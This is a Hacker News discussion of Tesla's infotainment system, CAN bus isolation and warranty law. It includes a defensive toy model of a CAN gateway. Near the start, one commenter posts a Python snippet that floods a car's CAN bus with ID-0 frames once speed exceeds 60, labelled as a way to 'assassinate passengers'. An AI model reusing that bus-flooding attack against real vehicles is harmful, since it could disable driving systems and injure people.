by jokr004 3708 days ago
>Even if the media subsystem is running on dedicated hardware, the fact that it's networked with the rest of the car means that there's still a risk of it being used to gain access to other components.

I don't think anyone was claiming anything contrary to that, just that replacing the software running the media dash isn't going to fubar your car.


I wouldn't be so sure.

I don't know enough about CAN bus to speak authoritatively about this, nor do I know the specifics of what the dashboard has access to, but given that the dash displays information like charge level and speed, I'd guess that the dash is getting that information directly from the CAN.

And I do know that CAN bus is very vulnerable. [1][2]... So you may be able to kill someone through /dev/can0, via a small program running in that chroot.

E.g., in Python:

    from canard import can
    from canard.file import jsondb
    from canard.hw import socketcan

    # create and start device
    dev = socketcan.SocketCanDev("/dev/can0")
    dev.start()

    # create our DoS frame
    frame = can.Frame(id=0)
    frame.dlc = 8

    # load tesla can spec, eg: from [4]
    # CAN3, ID 0x0256
    b = parser.parse('tesla.json')

    while True:
      rec = dev.recv()
      speedo = b.parse_frame(rec)
      # assassinate passengers
      if (speedo.speed > 60):
        while True:
          dev.send(frame) 

[1]: https://www.blackhat.com/docs/asia-15/materials/asia-15-Even...

[2]: http://security.stackexchange.com/questions/88724/is-there-a...

[3]: https://github.com/ericevenchick/CANard

[4]: http://skie.net/uploads/TeslaCAN/Tesla%20Model%20S%20CAN%20D...

Sensible cars have a device bridging high and low security networks, forwarding data from one to the other, specifically so that a misbehaving media device or light system can't clobber the brakes or ECU. No idea if the Tesla does this or not, but it's a fairly standard approach.
Yes, it has a gateway between the high level stuff and the low level stuff. It's fairly secure too. You can't just make calls to the CAN bus all willy-nilly either.
> You can't just make calls to the CAN bus all willy-nilly either.

What do you mean by that? I would think that once you get UID=0 nothing can stop you from doing whatever you want to that device.

It's a completely different computer—compare it to your typical web browser/web server model. The media computer can request display of the battery information (the browser can get a list of products) but it cannot hit the accelerator (the browser cannot read other users' personal information). Even if you have root on the media center (your laptop), that doesn't make it so you can run any and all commands on the computer that regulates steering and acceleration (the web server).
There is a gateway between the media center CAN bus and the critical CAN bus. The gateway buffers all the data from the critical CAN bus and rate limits any requests for data which isn't broadcast regularly on the critical CAN bus.

You would have to get UID=0 on the CAN bus gateway to make requests 'willy nilly' on the critical CAN bus. Having UID=0 on the media centre would only help in making willy nilly requests to the gateway.

edit: clarity

Though wasn't the Chrysler attack through one of these gateways?
The Chrysler was a completely different system, but it was indeed infecting the car from the radio / entertainment system. The Tesla is completely different from that. They have one entire computer system that runs the "entertainment console". You can even reboot it while you are driving and nothing happens (this is by design of course). The driving controls are totally separated. The only thing you notice when you reboot that console is that the radio goes off, the display goes black during the reboot (10 seconds). Then it comes back and all is well. Press both turning cylinder controls on the steering wheel for a few seconds to start the reboot. They designed it very well. That doesn't mean it is perfect, but they have approached security correctly as far as I can tell from outside. They pay for exploits too - see https://bugcrowd.com/tesla. They have hired security researchers to work on their system and attack it.

As a Tesla owner, I do wish they would hurry up and publish their app platform. They do have apps that they wrote themselves, that come with the car.

And I really wish they'd update their web browser, and even more wish they supported Linux. Maybe the Chromebook OS support will be secure enough for Android apps that even Tesla could use it.

But it might fubar your warranty...

"Your honor, we were not responsible for that AutoPilot crash because the driver did an unauthorized modification of the car's software!"

This should be handled like we handle replacing the brakes in your car if you do it yourself.
How is that handled?
This is part of the Magnuson Moss Warranty Act: https://en.wikipedia.org/wiki/Magnuson%E2%80%93Moss_Warranty...

In effect, the manufacturer can only deny warranty claims for a specific part iff the consumer's aftermarket repair/modifications were responsible for the warrantied part failing. i.e. "I tinted the windows, and now the brakes are failing" does not result in warranty claims on the brakes being denied. However, "I replaced the brake pads [with faulty pads], and now the brake rotors are failing" can result in a denied warranty claim.

While I appreciate the sentiment there, that seems like it's ripe for protracted litigation (which will never benefit the consumer).

Plus, in a connected car situation, it's going to be very difficult to prove that one thing didn't cause another.

Because you rooted the media control system, your unapproved software had the ability to speak to the brake control system and apply more-than-designed force to the brakes and thereby caused this damage.

Could you be forced into proving a negative?

That said, I think most of these things happen in the context of class action suits. In a class action, it's going to be hard to blame or exclude the 1% of the class that has rooted their car.

Not sure why you are being downvoted, you present a valid point.

The trouble is that with mechanical parts it is usually very easy to see connections between elements - not so in the digital world. I think the direction the car makers should take is to develop "microservices" with strict APIs, strict access lists and a guardian which double-checks if some requested operation really makes sense. That way if you root a media center you can't mess with the engine from there.

EDIT: I see from other comments that Tesla apparently does something similar. Too bad it's not standardized and open, but at least the approach is right...
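The gateway described earlier in the thread (buffer the critical bus, expose only an allowlist of values to the media side, rate limit on-demand requests, never forward raw media-side frames) and the "guardian with strict access lists" proposed in this comment are the same design. The toy model below is an added example written for this thread, not code from Tesla or from any commenter; the CAN IDs, the limits and the sample frames are constructed for illustration and do not come from any vehicle's real specification. It shows why root on the media side only buys you the ability to ask the gateway, and what the gateway logs when a request is refused.

```python
"""Toy model of a CAN gateway between an infotainment bus and a critical bus.

Hypothetical example: CAN IDs, limits and frame contents are constructed for
illustration and are not taken from any real vehicle.
"""
from collections import deque
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Frame:
    can_id: int
    data: bytes


@dataclass
class Gateway:
    # IDs the media side may read (constructed allowlist)
    readable_ids: frozenset
    # Latest frame per ID seen on the critical bus: the gateway buffers, it
    # never lets the media side listen to the critical bus directly
    critical_cache: dict = field(default_factory=dict)
    # Sliding-window rate limit for on-demand requests from the media side
    max_requests: int = 5
    window_seconds: float = 1.0
    _request_times: deque = field(default_factory=deque)
    # Every decision is recorded so denials can be monitored
    audit_log: list = field(default_factory=list)

    def on_critical_frame(self, frame: Frame) -> None:
        """Critical-bus broadcast arrives: cache it, do not forward it raw."""
        self.critical_cache[frame.can_id] = frame

    def _within_rate_limit(self, now: float) -> bool:
        # Drop timestamps that fell out of the window, then check the budget
        while self._request_times and now - self._request_times[0] >= self.window_seconds:
            self._request_times.popleft()
        if len(self._request_times) >= self.max_requests:
            return False
        self._request_times.append(now)
        return True

    def media_request(self, can_id: int, now: float):
        """Media side asks for a value. Returns the cached Frame, or None if denied."""
        if can_id not in self.readable_ids:
            self.audit_log.append(("deny_id", can_id, now))
            return None
        if not self._within_rate_limit(now):
            self.audit_log.append(("deny_rate", can_id, now))
            return None
        self.audit_log.append(("allow", can_id, now))
        return self.critical_cache.get(can_id)

    def media_to_critical(self, frame: Frame, now: float) -> bool:
        """Raw frames from the media side never reach the critical bus."""
        self.audit_log.append(("deny_write", frame.can_id, now))
        return False

    def denial_counts(self) -> dict:
        counts = {}
        for kind, _, _ in self.audit_log:
            if kind.startswith("deny_"):
                counts[kind] = counts.get(kind, 0) + 1
        return counts


def demo() -> dict:
    """Run a constructed scenario and return the gateway's decisions."""
    gw = Gateway(readable_ids=frozenset({0x100, 0x101}), max_requests=5)
    # Constructed critical-bus broadcasts: 0x100 speed, 0x101 charge, 0x200 brake command
    gw.on_critical_frame(Frame(0x100, b"\x00\x3c"))
    gw.on_critical_frame(Frame(0x101, b"\x55"))
    gw.on_critical_frame(Frame(0x200, b"\x00"))
    results = {}
    results["speed"] = gw.media_request(0x100, now=0.0)          # allowed
    results["brake_read"] = gw.media_request(0x200, now=0.1)     # not on allowlist
    # Burst of six requests inside one second: four more fit the budget of five
    burst = [gw.media_request(0x101, now=0.2 + i * 0.05) for i in range(6)]
    results["burst_allowed"] = sum(f is not None for f in burst)
    results["write"] = gw.media_to_critical(Frame(0x200, b"\xff"), now=0.6)
    # After the window rolls over the media side may ask again
    results["after_window"] = gw.media_request(0x101, now=1.5)
    results["denials"] = gw.denial_counts()
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The model deliberately has no path by which a media-side frame is placed on the critical bus, which is the property the thread attributes to the real gateway; an allowlist of readable IDs plus the audit log is what lets a defender both bound the exposure and notice a compromised media computer hammering the gateway.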

I don't know, but if you decide to tint your windows it doesn't somehow magically invalidate your powertrain warranty.